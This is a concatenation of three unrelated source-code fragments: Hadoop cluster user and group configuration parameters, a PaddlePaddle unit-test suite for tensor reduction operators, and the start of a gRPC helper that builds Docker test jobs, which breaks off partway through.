hbase_user = config['configurations']['hbase-env']['hbase_user']
smoke_user = config['configurations']['cluster-env']['smokeuser']
gmetad_user = config['configurations']['ganglia-env']["gmetad_user"]
gmond_user = config['configurations']['ganglia-env']["gmond_user"]
tez_user = config['configurations']['tez-env']["tez_user"]
oozie_user = config['configurations']['oozie-env']["oozie_user"]
falcon_user = config['configurations']['falcon-env']["falcon_user"]
ranger_user = config['configurations']['ranger-env']["ranger_user"]
user_group = config['configurations']['cluster-env']['user_group']
ganglia_server_hosts = default("/clusterHostInfo/ganglia_server_host", [])
namenode_host = default("/clusterHostInfo/namenode_host", [])
hbase_master_hosts = default("/clusterHostInfo/hbase_master_hosts", [])
oozie_servers = default("/clusterHostInfo/oozie_server", [])
falcon_server_hosts = default("/clusterHostInfo/falcon_server_hosts", [])
ranger_admin_hosts = default("/clusterHostInfo/ranger_admin_hosts", [])
has_namenode = len(namenode_host) > 0
has_ganglia_server = len(ganglia_server_hosts) > 0
has_tez = 'tez-site' in config['configurations']
has_hbase_masters = len(hbase_master_hosts) > 0
has_oozie_server = len(oozie_servers) > 0
has_falcon_server_hosts = len(falcon_server_hosts) > 0
has_ranger_admin = len(ranger_admin_hosts) > 0
if has_namenode or dfs_type == 'HCFS':
hadoop_conf_dir = conf_select.get_hadoop_conf_dir(force_latest_on_upgrade=True)
hbase_tmp_dir = "/tmp/hbase-hbase"
proxyuser_group = default("/configurations/hadoop-env/proxyuser_group","users")
ranger_group = config['configurations']['ranger-env']['ranger_group']
dfs_cluster_administrators_group = config['configurations']['hdfs-site']["dfs.cluster.administrators"]
ignore_groupsusers_create = default("/configurations/cluster-env/ignore_groupsusers_create", False)
fetch_nonlocal_groups = config['configurations']['cluster-env']["fetch_nonlocal_groups"]
smoke_user_dirs = format("/tmp/hadoop-{smoke_user},/tmp/hsperfdata_{smoke_user},/home/{smoke_user},/tmp/{smoke_user},/tmp/sqoop-{smoke_user}")
if has_hbase_masters:
hbase_user_dirs = format("/home/{hbase_user},/tmp/{hbase_user},/usr/bin/{hbase_user},/var/log/{hbase_user},{hbase_tmp_dir}")
#repo params
repo_info = config['hostLevelParams']['repo_info']
service_repo_info = default("/hostLevelParams/service_repo_info",None)
user_to_groups_dict = collections.defaultdict(lambda:[user_group])
user_to_groups_dict[smoke_user] = [proxyuser_group]
if has_ganglia_server:
user_to_groups_dict[gmond_user] = [gmond_user]
user_to_groups_dict[gmetad_user] = [gmetad_user]
if has_tez:
user_to_groups_dict[tez_user] = [proxyuser_group]
if has_oozie_server:
user_to_groups_dict[oozie_user] = [proxyuser_group]
if has_falcon_server_hosts:
user_to_groups_dict[falcon_user] = [proxyuser_group]
if has_ranger_admin:
user_to_groups_dict[ranger_user] = [ranger_group]
user_to_gid_dict = collections.defaultdict(lambda:user_group)
user_list = json.loads(config['hostLevelParams']['user_list'])
group_list = json.loads(config['hostLevelParams']['group_list'])
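# Both mappings above are defaultdicts: any user not explicitly listed falls
# back to the cluster user group, e.g. (illustrative sketch):
#     >>> user_to_groups_dict['some_unlisted_user'] == [user_group]
#     True
#     >>> user_to_gid_dict['some_unlisted_user'] == user_group
#     True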
host_sys_prepped = default("/hostLevelParams/host_sys_prepped", False)
if has_tez:
tez_am_view_acls = config['configurations']['tez-site']["tez.am.view-acls"]
override_uid = str(default("/configurations/cluster-env/override_uid", "true")).lower()
##### Custom extensions ######
#Hadoop custom extensions
hadoop_custom_extensions_enabled = default("/configurations/core-site/hadoop.custom-extensions.enabled", False)
hadoop_custom_extensions_services = default("/configurations/core-site/hadoop.custom-extensions.services", "")
hadoop_custom_extensions_owner = default("/configurations/core-site/hadoop.custom-extensions.owner", hdfs_user)
hadoop_custom_extensions_services = [ service.strip().upper() for service in hadoop_custom_extensions_services.split(",") ]
hadoop_custom_extensions_services.append("YARN")
hadoop_custom_extensions_hdfs_dir = "/iop/ext/{0}/hadoop".format(stack_version_formatted)
hadoop_custom_extensions_local_dir = "{0}/current/ext/hadoop".format(Script.get_stack_root())
|
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from op_test import OpTest, skip_check_grad_ci
import paddle
import paddle.fluid.core as core
import paddle.fluid as fluid
from paddle.fluid import compiler, Program, program_guard
from paddle.fluid.framework import convert_np_dtype_to_dtype_
class TestSumOp(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random((5, 6, 10)).astype("float64")}
self.outputs = {'Out': self.inputs['X'].sum(axis=0)}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
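# The OpTest pattern used throughout this file: build random inputs, compute
# the expected result with NumPy, then let check_output()/check_grad() compare
# the operator against that reference. A sketch of TestSumOp's reference:
#     >>> x = np.random.random((5, 6, 10))
#     >>> x.sum(axis=0).shape
#     (6, 10)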
class TestSumOp_fp16(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {
'X': np.random.uniform(0, 0.1, (5, 6, 10)).astype("float16")
}
self.attrs = {'dim': [0, 1, 2]}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']))
}
self.gradient = self.calc_gradient()
def test_check_output(self):
self.check_output()
def calc_gradient(self):
x = self.inputs["X"]
grad = np.ones(x.shape, dtype=x.dtype)
return grad,
def test_check_grad(self):
self.check_grad(['X'], 'Out', user_defined_grads=self.gradient)
class TestSumOp_fp16_withInt(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {
            # Half precision can represent integers in [0, 2048] exactly; see
            # https://en.wikipedia.org/wiki/Half-precision_floating-point_format
'X': np.random.randint(0, 30, (10, 10)).astype("float16")
}
self.attrs = {'dim': [0, 1]}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']))
}
self.gradient = self.calc_gradient()
def test_check_output(self):
self.check_output()
def calc_gradient(self):
x = self.inputs["X"]
grad = np.ones(x.shape, dtype=x.dtype)
return grad,
def test_check_grad(self):
self.check_grad(['X'], 'Out', user_defined_grads=self.gradient)
class TestSumOp5D(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {
'X': np.random.random((1, 2, 5, 6, 10)).astype("float64")
}
self.outputs = {'Out': self.inputs['X'].sum(axis=0)}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestSumOp6D(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {
'X': np.random.random((1, 1, 2, 5, 6, 10)).astype("float64")
}
self.outputs = {'Out': self.inputs['X'].sum(axis=0)}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestSumOp8D(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {
'X': np.random.random((1, 3, 1, 2, 1, 4, 3, 10)).astype("float64")
}
self.attrs = {'dim': (0, 3)}
self.outputs = {'Out': self.inputs['X'].sum(axis=(0, 3))}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
@skip_check_grad_ci(
    reason="reduce_max is a discontinuous, non-differentiable function,"
    " so its gradient check is not supported by the unittest framework.")
class TestMaxOp(OpTest):
    """Max has only a subgradient, so its gradient check is skipped to keep CI passing."""
def setUp(self):
self.op_type = "reduce_max"
self.inputs = {'X': np.random.random((5, 6, 10)).astype("float64")}
self.attrs = {'dim': [-1]}
self.outputs = {
'Out': self.inputs['X'].max(axis=tuple(self.attrs['dim']))
}
def test_check_output(self):
self.check_output()
@skip_check_grad_ci(
    reason="reduce_min is a discontinuous, non-differentiable function,"
    " so its gradient check is not supported by the unittest framework.")
class TestMinOp(OpTest):
    """Min has only a subgradient, so its gradient check is skipped to keep CI passing."""
def setUp(self):
self.op_type = "reduce_min"
self.inputs = {'X': np.random.random((5, 6, 10)).astype("float64")}
self.attrs = {'dim': [2]}
self.outputs = {
'Out': self.inputs['X'].min(axis=tuple(self.attrs['dim']))
}
def test_check_output(self):
self.check_output()
class TestMin6DOp(OpTest):
"""Remove Min with subgradient from gradient check to confirm the success of CI."""
def setUp(self):
self.op_type = "reduce_min"
self.inputs = {
'X': np.random.random((2, 4, 3, 5, 6, 10)).astype("float64")
}
self.attrs = {'dim': [2, 4]}
self.outputs = {
'Out': self.inputs['X'].min(axis=tuple(self.attrs['dim']))
}
def test_check_output(self):
self.check_output()
class TestMin8DOp(OpTest):
"""Remove Min with subgradient from gradient check to confirm the success of CI."""
def setUp(self):
self.op_type = "reduce_min"
self.inputs = {
'X': np.random.random((2, 4, 3, 5, 6, 3, 2, 4)).astype("float64")
}
self.attrs = {'dim': [2, 3, 4]}
self.outputs = {
'Out': self.inputs['X'].min(axis=tuple(self.attrs['dim']))
}
def test_check_output(self):
self.check_output()
class TestProdOp(OpTest):
def setUp(self):
self.op_type = "reduce_prod"
self.init_data_type()
self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.data_type)}
self.outputs = {'Out': self.inputs['X'].prod(axis=0)}
def init_data_type(self):
self.data_type = "float32" if core.is_compiled_with_rocm(
) else "float64"
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestProd6DOp(OpTest):
def setUp(self):
self.op_type = "reduce_prod"
self.init_data_type()
self.inputs = {
'X': np.random.random((5, 6, 2, 3, 4, 2)).astype(self.data_type)
}
self.attrs = {'dim': [2, 3, 4]}
self.outputs = {
'Out': self.inputs['X'].prod(axis=tuple(self.attrs['dim']))
}
def init_data_type(self):
self.data_type = "float32" if core.is_compiled_with_rocm(
) else "float64"
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestProd8DOp(OpTest):
def setUp(self):
self.op_type = "reduce_prod"
self.init_data_type()
self.inputs = {
'X': np.random.random(
(2, 5, 3, 2, 2, 3, 4, 2)).astype(self.data_type)
}
self.attrs = {'dim': [2, 3, 4]}
self.outputs = {
'Out': self.inputs['X'].prod(axis=tuple(self.attrs['dim']))
}
def init_data_type(self):
self.data_type = "float32" if core.is_compiled_with_rocm(
) else "float64"
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestAllOp(OpTest):
def setUp(self):
self.op_type = "reduce_all"
self.inputs = {'X': np.random.randint(0, 2, (5, 6, 10)).astype("bool")}
self.outputs = {'Out': self.inputs['X'].all()}
self.attrs = {'reduce_all': True}
def test_check_output(self):
self.check_output()
class TestAll8DOp(OpTest):
def setUp(self):
self.op_type = "reduce_all"
self.inputs = {
'X': np.random.randint(0, 2,
(2, 5, 3, 2, 2, 3, 4, 2)).astype("bool")
}
self.attrs = {'reduce_all': True, 'dim': (2, 3, 4)}
self.outputs = {'Out': self.inputs['X'].all(axis=self.attrs['dim'])}
def test_check_output(self):
self.check_output()
class TestAllOpWithDim(OpTest):
def setUp(self):
self.op_type = "reduce_all"
self.inputs = {'X': np.random.randint(0, 2, (5, 6, 10)).astype("bool")}
self.attrs = {'dim': (1, )}
self.outputs = {'Out': self.inputs['X'].all(axis=self.attrs['dim'])}
def test_check_output(self):
self.check_output()
class TestAll8DOpWithDim(OpTest):
def setUp(self):
self.op_type = "reduce_all"
self.inputs = {
'X': np.random.randint(0, 2,
(2, 5, 3, 2, 2, 3, 4, 2)).astype("bool")
}
self.attrs = {'dim': (1, 3, 4)}
self.outputs = {'Out': self.inputs['X'].all(axis=self.attrs['dim'])}
def test_check_output(self):
self.check_output()
class TestAllOpWithKeepDim(OpTest):
def setUp(self):
self.op_type = "reduce_all"
self.inputs = {'X': np.random.randint(0, 2, (5, 6, 10)).astype("bool")}
self.attrs = {'dim': [1], 'keep_dim': True}
self.outputs = {
'Out': np.expand_dims(
self.inputs['X'].all(axis=1), axis=1)
}
def test_check_output(self):
self.check_output()
class TestAll8DOpWithKeepDim(OpTest):
def setUp(self):
self.op_type = "reduce_all"
self.inputs = {
'X': np.random.randint(0, 2,
(2, 5, 3, 2, 2, 3, 4, 2)).astype("bool")
}
self.attrs = {'dim': (5, ), 'keep_dim': True}
self.outputs = {
'Out': np.expand_dims(
self.inputs['X'].all(axis=self.attrs['dim']), axis=5)
}
def test_check_output(self):
self.check_output()
class TestAllOpError(unittest.TestCase):
def test_errors(self):
with program_guard(Program(), Program()):
# The input type of reduce_all_op must be Variable.
input1 = 12
self.assertRaises(TypeError, fluid.layers.reduce_all, input1)
# The input dtype of reduce_all_op must be bool.
input2 = fluid.layers.data(
name='input2', shape=[12, 10], dtype="int32")
self.assertRaises(TypeError, fluid.layers.reduce_all, input2)
class TestAnyOp(OpTest):
def setUp(self):
self.op_type = "reduce_any"
self.inputs = {'X': np.random.randint(0, 2, (5, 6, 10)).astype("bool")}
self.outputs = {'Out': self.inputs['X'].any()}
self.attrs = {'reduce_all': True}
def test_check_output(self):
self.check_output()
class TestAny8DOp(OpTest):
def setUp(self):
self.op_type = "reduce_any"
self.inputs = {
'X': np.random.randint(0, 2,
(2, 5, 3, 2, 2, 3, 4, 2)).astype("bool")
}
self.attrs = {'reduce_all': True, 'dim': (3, 5, 4)}
self.outputs = {'Out': self.inputs['X'].any(axis=self.attrs['dim'])}
def test_check_output(self):
self.check_output()
class TestAnyOpWithDim(OpTest):
def setUp(self):
self.op_type = "reduce_any"
self.inputs = {'X': np.random.randint(0, 2, (5, 6, 10)).astype("bool")}
self.attrs = {'dim': [1]}
self.outputs = {'Out': self.inputs['X'].any(axis=1)}
def test_check_output(self):
self.check_output()
class TestAny8DOpWithDim(OpTest):
def setUp(self):
self.op_type = "reduce_any"
self.inputs = {
'X': np.random.randint(0, 2,
(2, 5, 3, 2, 2, 3, 4, 2)).astype("bool")
}
self.attrs = {'dim': (3, 6)}
self.outputs = {'Out': self.inputs['X'].any(axis=self.attrs['dim'])}
def test_check_output(self):
self.check_output()
class TestAnyOpWithKeepDim(OpTest):
def setUp(self):
self.op_type = "reduce_any"
self.inputs = {'X': np.random.randint(0, 2, (5, 6, 10)).astype("bool")}
self.attrs = {'dim': (1, ), 'keep_dim': True}
self.outputs = {
'Out': np.expand_dims(
self.inputs['X'].any(axis=self.attrs['dim']), axis=1)
}
def test_check_output(self):
self.check_output()
class TestAny8DOpWithKeepDim(OpTest):
def setUp(self):
self.op_type = "reduce_any"
self.inputs = {
'X': np.random.randint(0, 2,
(2, 5, 3, 2, 2, 3, 4, 2)).astype("bool")
}
self.attrs = {'dim': (1, ), 'keep_dim': True}
self.outputs = {
'Out': np.expand_dims(
self.inputs['X'].any(axis=self.attrs['dim']), axis=1)
}
def test_check_output(self):
self.check_output()
class TestAnyOpError(unittest.TestCase):
def test_errors(self):
with program_guard(Program(), Program()):
# The input type of reduce_any_op must be Variable.
input1 = 12
self.assertRaises(TypeError, fluid.layers.reduce_any, input1)
# The input dtype of reduce_any_op must be bool.
input2 = fluid.layers.data(
name='input2', shape=[12, 10], dtype="int32")
self.assertRaises(TypeError, fluid.layers.reduce_any, input2)
class Test1DReduce(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random(120).astype("float64")}
self.outputs = {'Out': self.inputs['X'].sum(axis=0)}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class Test2DReduce0(Test1DReduce):
def setUp(self):
self.op_type = "reduce_sum"
self.attrs = {'dim': [0]}
self.inputs = {'X': np.random.random((20, 10)).astype("float64")}
self.outputs = {'Out': self.inputs['X'].sum(axis=0)}
class Test2DReduce1(Test1DReduce):
def setUp(self):
self.op_type = "reduce_sum"
self.attrs = {'dim': [1]}
self.inputs = {'X': np.random.random((20, 10)).astype("float64")}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']))
}
class Test3DReduce0(Test1DReduce):
def setUp(self):
self.op_type = "reduce_sum"
self.attrs = {'dim': [1]}
self.inputs = {'X': np.random.random((5, 6, 7)).astype("float64")}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']))
}
class Test3DReduce1(Test1DReduce):
def setUp(self):
self.op_type = "reduce_sum"
self.attrs = {'dim': [2]}
self.inputs = {'X': np.random.random((5, 6, 7)).astype("float64")}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']))
}
class Test3DReduce2(Test1DReduce):
def setUp(self):
self.op_type = "reduce_sum"
self.attrs = {'dim': [-2]}
self.inputs = {'X': np.random.random((5, 6, 7)).astype("float64")}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']))
}
class Test3DReduce3(Test1DReduce):
def setUp(self):
self.op_type = "reduce_sum"
self.attrs = {'dim': [1, 2]}
self.inputs = {'X': np.random.random((5, 6, 7)).astype("float64")}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']))
}
class Test8DReduce0(Test1DReduce):
def setUp(self):
self.op_type = "reduce_sum"
self.attrs = {'dim': (4, 2, 3)}
self.inputs = {
'X': np.random.random((2, 5, 3, 2, 2, 3, 4, 2)).astype("float64")
}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']))
}
class TestKeepDimReduce(Test1DReduce):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random((5, 6, 10)).astype("float64")}
self.attrs = {'dim': [1], 'keep_dim': True}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']),
keepdims=self.attrs['keep_dim'])
}
class TestKeepDim8DReduce(Test1DReduce):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {
'X': np.random.random((2, 5, 3, 2, 2, 3, 4, 2)).astype("float64")
}
self.attrs = {'dim': (3, 4, 5), 'keep_dim': True}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']),
keepdims=self.attrs['keep_dim'])
}
@skip_check_grad_ci(
    reason="reduce_max is a discontinuous, non-differentiable function,"
    " so its gradient check is not supported by the unittest framework.")
class TestReduceMaxOpMultiAxises(OpTest):
    """Max has only a subgradient, so its gradient check is skipped to keep CI passing."""
def setUp(self):
self.op_type = "reduce_max"
self.inputs = {'X': np.random.random((5, 6, 10)).astype("float64")}
self.attrs = {'dim': [-2, -1]}
self.outputs = {
'Out': self.inputs['X'].max(axis=tuple(self.attrs['dim']))
}
def test_check_output(self):
self.check_output()
@skip_check_grad_ci(
    reason="reduce_min is a discontinuous, non-differentiable function,"
    " so its gradient check is not supported by the unittest framework.")
class TestReduceMinOpMultiAxises(OpTest):
    """Min has only a subgradient, so its gradient check is skipped to keep CI passing."""
def setUp(self):
self.op_type = "reduce_min"
self.inputs = {'X': np.random.random((5, 6, 10)).astype("float64")}
self.attrs = {'dim': [1, 2]}
self.outputs = {
'Out': self.inputs['X'].min(axis=tuple(self.attrs['dim']))
}
def test_check_output(self):
self.check_output()
class TestKeepDimReduceSumMultiAxises(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random((5, 6, 10)).astype("float64")}
self.attrs = {'dim': [-2, -1], 'keep_dim': True}
self.outputs = {
'Out':
self.inputs['X'].sum(axis=tuple(self.attrs['dim']), keepdims=True)
}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestReduceSumWithDimOne(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random((100, 1, 1)).astype("float64")}
self.attrs = {'dim': [1, 2], 'keep_dim': True}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']),
keepdims=True)
}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestReduceSumWithNumelOne(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random((100, 1)).astype("float64")}
self.attrs = {'dim': [1], 'keep_dim': False}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']),
keepdims=False)
}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestReduceAll(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random((100, 1, 1)).astype("float64")}
self.attrs = {'reduce_all': True, 'keep_dim': False}
self.outputs = {'Out': self.inputs['X'].sum()}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class Test1DReduceWithAxes1(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random(100).astype("float64")}
self.attrs = {'dim': [0], 'keep_dim': False}
self.outputs = {'Out': self.inputs['X'].sum(axis=0)}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestReduceWithDtype(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random((6, 2, 10)).astype("float64")}
self.outputs = {'Out': self.inputs['X'].sum().astype('float64')}
self.attrs = {'reduce_all': True}
self.attrs.update({
'in_dtype': int(convert_np_dtype_to_dtype_(np.float32)),
'out_dtype': int(convert_np_dtype_to_dtype_(np.float64))
})
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestReduceWithDtype1(TestReduceWithDtype):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random((6, 2, 10)).astype("float64")}
self.outputs = {'Out': self.inputs['X'].sum(axis=1)}
self.attrs = {'dim': [1]}
self.attrs.update({
'in_dtype': int(convert_np_dtype_to_dtype_(np.float32)),
'out_dtype': int(convert_np_dtype_to_dtype_(np.float64))
})
class TestReduceWithDtype2(TestReduceWithDtype):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random((6, 2, 10)).astype("float64")}
self.outputs = {'Out': self.inputs['X'].sum(axis=1, keepdims=True)}
self.attrs = {'dim': [1], 'keep_dim': True}
self.attrs.update({
'in_dtype': int(convert_np_dtype_to_dtype_(np.float32)),
'out_dtype': int(convert_np_dtype_to_dtype_(np.float64))
})
class TestReduceSumOpError(unittest.TestCase):
def test_errors(self):
with program_guard(Program(), Program()):
# The input type of reduce_sum_op must be Variable.
x1 = fluid.create_lod_tensor(
np.array([[-1]]), [[1]], fluid.CPUPlace())
self.assertRaises(TypeError, fluid.layers.reduce_sum, x1)
# The input dtype of reduce_sum_op must be float32 or float64 or int32 or int64.
x2 = fluid.layers.data(name='x2', shape=[4], dtype="uint8")
self.assertRaises(TypeError, fluid.layers.reduce_sum, x2)
class API_TestSumOp(unittest.TestCase):
def run_static(self,
shape,
x_dtype,
attr_axis,
attr_dtype=None,
np_axis=None):
if np_axis is None:
np_axis = attr_axis
with fluid.program_guard(fluid.Program(), fluid.Program()):
data = fluid.data("data", shape=shape, dtype=x_dtype)
result_sum = paddle.sum(x=data, axis=attr_axis, dtype=attr_dtype)
exe = fluid.Executor(fluid.CPUPlace())
input_data = np.random.rand(*shape).astype(x_dtype)
res, = exe.run(feed={"data": input_data}, fetch_list=[result_sum])
self.assertTrue(
np.allclose(
res, np.sum(input_data.astype(attr_dtype), axis=np_axis)))
def test_static(self):
shape = [10, 10]
axis = 1
self.run_static(shape, "bool", axis, attr_dtype=None)
self.run_static(shape, "bool", axis, attr_dtype="int32")
self.run_static(shape, "bool", axis, attr_dtype="int64")
self.run_static(shape, "int32", axis, attr_dtype=None)
self.run_static(shape, "int32", axis, attr_dtype="int32")
self.run_static(shape, "int32", axis, attr_dtype="int64")
self.run_static(shape, "int64", axis, attr_dtype=None)
self.run_static(shape, "int64", axis, attr_dtype="int64")
self.run_static(shape, "int64", axis, attr_dtype="int32")
self.run_static(shape, "float32", axis, attr_dtype=None)
self.run_static(shape, "float32", axis, attr_dtype="float32")
self.run_static(shape, "float32", axis, attr_dtype="float64")
self.run_static(shape, "float64", axis, attr_dtype=None)
self.run_static(shape, "float64", axis, attr_dtype="float32")
self.run_static(shape, "float64", axis, attr_dtype="float64")
shape = [5, 5, 5]
self.run_static(shape, "int32", (0, 1), attr_dtype="int32")
self.run_static(
shape, "int32", (), attr_dtype="int32", np_axis=(0, 1, 2))
def test_dygraph(self):
np_x = np.random.random([2, 3, 4]).astype('int32')
with fluid.dygraph.guard():
x = fluid.dygraph.to_variable(np_x)
out0 = paddle.sum(x).numpy()
out1 = paddle.sum(x, axis=0).numpy()
out2 = paddle.sum(x, axis=(0, 1)).numpy()
out3 = paddle.sum(x, axis=(0, 1, 2)).numpy()
self.assertTrue((out0 == np.sum(np_x, axis=(0, 1, 2))).all())
self.assertTrue((out1 == np.sum(np_x, axis=0)).all())
self.assertTrue((out2 == np.sum(np_x, axis=(0, 1))).all())
self.assertTrue((out3 == np.sum(np_x, axis=(0, 1, 2))).all())
class TestAllAPI(unittest.TestCase):
def setUp(self):
np.random.seed(123)
paddle.enable_static()
self.places = [fluid.CPUPlace()]
if core.is_compiled_with_cuda():
self.places.append(fluid.CUDAPlace(0))
def check_static_result(self, place):
with fluid.program_guard(fluid.Program(), fluid.Program()):
input = fluid.data(name="input", shape=[4, 4], dtype="bool")
result = paddle.all(x=input)
input_np = np.random.randint(0, 2, [4, 4]).astype("bool")
exe = fluid.Executor(place)
fetches = exe.run(fluid.default_main_program(),
feed={"input": input_np},
fetch_list=[result])
self.assertTrue(np.allclose(fetches[0], np.all(input_np)))
def test_static(self):
for place in self.places:
self.check_static_result(place=place)
def test_dygraph(self):
paddle.disable_static()
for place in self.places:
with fluid.dygraph.guard(place):
np_x = np.random.randint(0, 2, (12, 10)).astype(np.bool)
x = fluid.layers.assign(np_x)
x = fluid.layers.cast(x, 'bool')
out1 = paddle.all(x)
np_out1 = out1.numpy()
expect_res1 = np.all(np_x)
self.assertTrue((np_out1 == expect_res1).all())
out2 = paddle.all(x, axis=0)
np_out2 = out2.numpy()
expect_res2 = np.all(np_x, axis=0)
self.assertTrue((np_out2 == expect_res2).all())
out3 = paddle.all(x, axis=-1)
np_out3 = out3.numpy()
expect_res3 = np.all(np_x, axis=-1)
self.assertTrue((np_out3 == expect_res3).all())
out4 = paddle.all(x, axis=1, keepdim=True)
np_out4 = out4.numpy()
expect_res4 = np.all(np_x, axis=1, keepdims=True)
self.assertTrue((np_out4 == expect_res4).all())
paddle.enable_static()
class TestAnyAPI(unittest.TestCase):
def setUp(self):
np.random.seed(123)
paddle.enable_static()
self.places = [fluid.CPUPlace()]
if core.is_compiled_with_cuda():
self.places.append(fluid.CUDAPlace(0))
def check_static_result(self, place):
with fluid.program_guard(fluid.Program(), fluid.Program()):
input = fluid.data(name="input", shape=[4, 4], dtype="bool")
result = paddle.any(x=input)
input_np = np.random.randint(0, 2, [4, 4]).astype("bool")
exe = fluid.Executor(place)
fetches = exe.run(fluid.default_main_program(),
feed={"input": input_np},
fetch_list=[result])
self.assertTrue(np.allclose(fetches[0], np.any(input_np)))
def test_static(self):
for place in self.places:
self.check_static_result(place=place)
def test_dygraph(self):
paddle.disable_static()
for place in self.places:
with fluid.dygraph.guard(place):
np_x = np.random.randint(0, 2, (12, 10)).astype(np.bool)
x = fluid.layers.assign(np_x)
x = fluid.layers.cast(x, 'bool')
out1 = paddle.any(x)
np_out1 = out1.numpy()
expect_res1 = np.any(np_x)
self.assertTrue((np_out1 == expect_res1).all())
out2 = paddle.any(x, axis=0)
np_out2 = out2.numpy()
expect_res2 = np.any(np_x, axis=0)
self.assertTrue((np_out2 == expect_res2).all())
out3 = paddle.any(x, axis=-1)
np_out3 = out3.numpy()
expect_res3 = np.any(np_x, axis=-1)
self.assertTrue((np_out3 == expect_res3).all())
out4 = paddle.any(x, axis=1, keepdim=True)
np_out4 = out4.numpy()
expect_res4 = np.any(np_x, axis=1, keepdims=True)
self.assertTrue((np_out4 == expect_res4).all())
paddle.enable_static()
if __name__ == '__main__':
import paddle
paddle.enable_static()
unittest.main()
|
|
#!/usr/bin/env python
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Definition of targets run distribution package tests."""
import os.path
import sys
sys.path.insert(0, os.path.abspath('..'))
import python_utils.jobset as jobset
def create_docker_jobspec(name,
dockerfile_dir,
shell_command,
environ={},
flake_retries=0,
timeout_retries=0,
copy_rel_path=None,
timeout_seconds=30 * 60):
"""Creates jobspec for a task running under docker."""
environ = environ.copy()
environ['RUN_COMMAND'] = shell_command
# the entire repo will be cloned if copy_rel_path is not set.
if copy_rel_path:
environ['RELATIVE_COPY_PATH'] = copy_rel_path
docker_args = []
for k, v in list(environ.items()):
docker_args += ['-e', '%s=%s' % (k, v)]
docker_env = {
'DOCKERFILE_DIR': dockerfile_dir,
'DOCKER_RUN_SCRIPT': 'tools/run_tests/dockerize/docker_run.sh'
}
jobspec = jobset.JobSpec(
cmdline=['tools/run_tests/dockerize/build_and_run_docker.sh'] +
docker_args,
environ=docker_env,
shortname='distribtest.%s' % (name),
timeout_seconds=timeout_seconds,
flake_retries=flake_retries,
timeout_retries=timeout_retries)
return jobspec
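# Example usage (mirroring PythonDistribTest.build_jobspec below):
#
#     spec = create_docker_jobspec(
#         'python_x64_buster',
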